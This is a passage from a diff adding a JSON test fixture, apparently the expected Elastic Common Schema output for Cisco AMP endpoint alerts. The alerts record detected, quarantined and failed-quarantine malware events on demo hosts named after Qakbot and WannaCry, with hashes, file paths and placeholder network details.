+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6412604589194870785",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T15:24:25.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_3"
+                ],
+                "hash": [
+                    "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_3",
+                "hostname": "Demo_Qakbot_3"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500222246Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6412604589194871000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "02:2f:e0:10:03:5d",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "02:2f:e0:10:03:5d"
+                        ]
+                    },
+                    "detection_id": "6412604589194870785",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T15:18:49.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500224289Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419239055241773000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419239055241773128",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "lsass.exe",
+                "pid": 708,
+                "hash": {
+                    "sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
+                    "sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
+                    "md5": "4e568dbe3fff1a0025eb432dc929b78f"
+                }
+            },
+            "@timestamp": "2021-01-14T15:18:49.000Z",
+            "file": {
+                "name": "mssecsvc.exe",
+                "path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe",
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500226335Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419239055241773000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419239055241773128",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T15:18:48.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500228382Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239050946806000,\"timestamp\":1610637528,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T15:18:48+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419239046651838535\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419239050946806000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419239046651838535",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:06.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500230510Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":87000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419229335730782000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419229331435814971",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:06.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500232553Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":56000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419229335730782000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419229331435814970",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:06.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500234601Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":773000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419229335730782000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419229335730782278",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:06.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500236656Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":648000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419229335730782000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419229335730782277",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:06.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:54.500238724Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229335730782000,\"timestamp\":1610635266,\"timestamp_nanoseconds\":570000000,\"date\":\"2021-01-14T14:41:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229335730782276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419229335730782000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
